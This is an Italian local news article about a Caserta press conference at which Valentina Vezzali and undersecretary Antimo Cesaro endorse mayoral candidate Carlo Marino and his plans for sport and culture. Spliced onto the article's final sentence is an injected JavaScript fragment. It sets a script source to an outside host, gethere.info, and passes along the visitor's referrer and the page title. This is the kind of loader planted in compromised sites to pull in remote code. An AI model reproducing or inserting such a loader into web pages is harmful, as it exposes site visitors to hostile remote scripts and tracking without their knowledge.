Marino incontra la Vezzali: «Sport elemento di crescita sociale e strumento contro la delinquenza»

«Ho accettato con entusiasmo l’invito ad essere qui oggi con Carlo Marino perché il suo programma dà grande risalto allo sport e perché sono convinta che riuscirà a vincere e poi a mettere in pratica tutti i suoi progetti». A dichiararlo è stata la grande campionessa di scherma e deputato Valentina Vezzali, che oggi all’Hotel Royal ha tenuto una conferenza stampa assieme al candidato sindaco di Caserta per la coalizione di centrosinistra, Carlo Marino, e al sottosegretario ai Beni e alle Attività Culturali, Antimo Cesaro.
«Cultura, sport e protezione sociale – ha spiegato Marino – diventano elementi fondamentali per costruire una società migliore. Abbiamo una grossa responsabilità: guidare i processi di sviluppo di un territorio difficile. Abbiamo anche una grande opportunità, ovvero quella di valorizzare tante eccezionali potenzialità. Lo sport è un elemento straordinario sotto il profilo sociale. Abbiamo grandi eccellenze, e oltre alle realtà più importanti e note, anche i cosiddetti sport minori sono un punto di riferimento. In particolare – ha proseguito – la scherma è un patrimonio di questa città. La nostra aspirazione è creare uno ‘scherma stadium’, una struttura che sia punto di riferimento sotto il profilo sportivo e anche culturale. Caserta è una città che ha problemi grandi, ma anche grandi opportunità. Sport e cultura, assieme alla scuola,  – ha concluso Marino – sono gli elementi attraverso i quali costruire il futuro».
Valentina Vezzali ha spiegato che «nello sport, ma anche in politica, non si vince da soli, ma vince lo schieramento, una compagine di persone che lavorano per un obiettivo comune, ovvero migliorare la comunità. Il sindaco si deve avvalere di una ottima squadra, di un Consiglio di qualità. Il candidato Marino è un avvocato, potrà operare nel rispetto della legalità e dare quel contributo fondamentale alla rinascita del territorio. Lo sport – ha proseguito la Vezzali – produce ricchezza, previene il disagio giovanile e la delinquenza e favorisce lo sviluppo sociale. Sto portando avanti tante iniziative per lo sviluppo dello sport. È arrivato il momento per far capire la valenza sociale dello sport nell’ambito della nostra collettività». La Vezzali ha concluso il suo intervento facendo un appello ai cittadini casertani: “Bisogna stare uniti – ha detto – per il nostro candidato Carlo Marino, con l’auspicio e la convinzione che riuscirà a risollevare la città di Caserta”.
Il sottosegretario Cesaro ha concluso la conferenza, facendo riferimento agli ultimi giorni di campagna elettorale: «Caserta volta pagina, cambia volto – ha dichiarato – se cambiano le logiche della politica. Noi scommettiamo su Carlo Marino, su un modo di fare politica nuovo, fresco e ricco di contenuti. C’è un’altra Caserta da raccontare, ovvero una grande città con delle straordinarie potenzialità. La classe politica non è stata all’altezza di queste potenzialità. Con Carlo e con l’intera coalizione abbiamo inteso contribuire a dare la svolta necessaria a questa città. Il Governo sarà al fianco della Giunta Marino, dando quel fondamentale sostegno di cui Caserta ha bisogno». Al termine della conferenza stampa la Vezzali ha donato a Carlo Marino una copia autografata del suo libro «Io, Valentina Vezzali».s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Commenti

    Nessun commento

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi con l'asterisco sono obbligatori.